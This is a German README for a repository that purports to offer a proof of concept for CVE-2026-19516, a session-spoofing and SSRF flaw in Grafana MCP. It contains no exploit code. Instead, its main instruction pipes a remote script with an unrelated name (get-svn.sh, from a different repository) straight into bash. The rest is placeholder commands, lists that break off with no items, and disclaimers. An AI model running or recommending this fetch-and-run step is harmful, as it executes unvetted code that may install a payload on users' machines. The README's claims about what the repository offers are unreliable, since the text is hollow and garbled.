
Proof-of-Concept für CVE-2026-19516, das Session-Spoofing und SSRF in Grafana MCP demonstriert. Vorgesehen für autorisierte Sicherheitsforschung und Schulung in isolierten Umgebungen.
Führen Sie die neueste Version des externen Download-Skripts direkt von GitHub aus:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
Dieser Befehl erfordert Bash und
curl. Überprüfen Sie das entfernte Skript, bevor Sie es ausführen, wenn Sie der Quelle nicht vertrauen.
Verwenden Sie dieses Projekt nur in sicheren und autorisierten Umgebungen wie:
Beispiel-Setup:
git clone <repository-url>
cd <repository-name>
# Projekt verwendet Python, siehe unten
# Eine virtuelle Umgebung erstellen
python -m venv venv
# Die virtuelle Umgebung aktivieren
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Anforderungen installieren
pip install -r requirements.txt
Beispielverwendung:
# Abhängigkeiten installieren
<install-command>
# Das Projekt ausführen
<run-command>
# Ersetzen Sie die obigen Befehle durch Ihre tatsächlichen Projekteinrichtungsschritte.
Ein Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.
Dieses Repository dient ausschließlich der pädagogischen und autorisierten Sicherheitsforschung.
Es wurde entwickelt, um Benutzern zu helfen, Folgendes zu lernen:
Verwenden Sie dieses Repository nur in Umgebungen, in denen Sie die Berechtigung haben, wie zum Beispiel:
Unbefugte oder illegale Nutzung ist strengstens untersagt.
Der Autor und die Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.
Durch die Nutzung dieses Repositorys stimmen Sie zu, dass:
Dieses Projekt ist bestimmt für:
Bitte befolgen Sie Praktiken der verantwortungsvollen Offenlegung und halten Sie alle geltenden Gesetze ein.
Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktieren Sie den Repository-Betreuer über GitHub.
Entdecken Sie die PoC-CVE-Sammlung für zusätzliche CVE-Proof-of-Concept-Ressourcen, die für autorisierte Sicherheitsforschung und Bildung bestimmt sind.
Valid, But Never Issued: Session Spoofing and SSRF in Grafana MCP, CVE-2026-19516 poc, poc CVE-2026-19516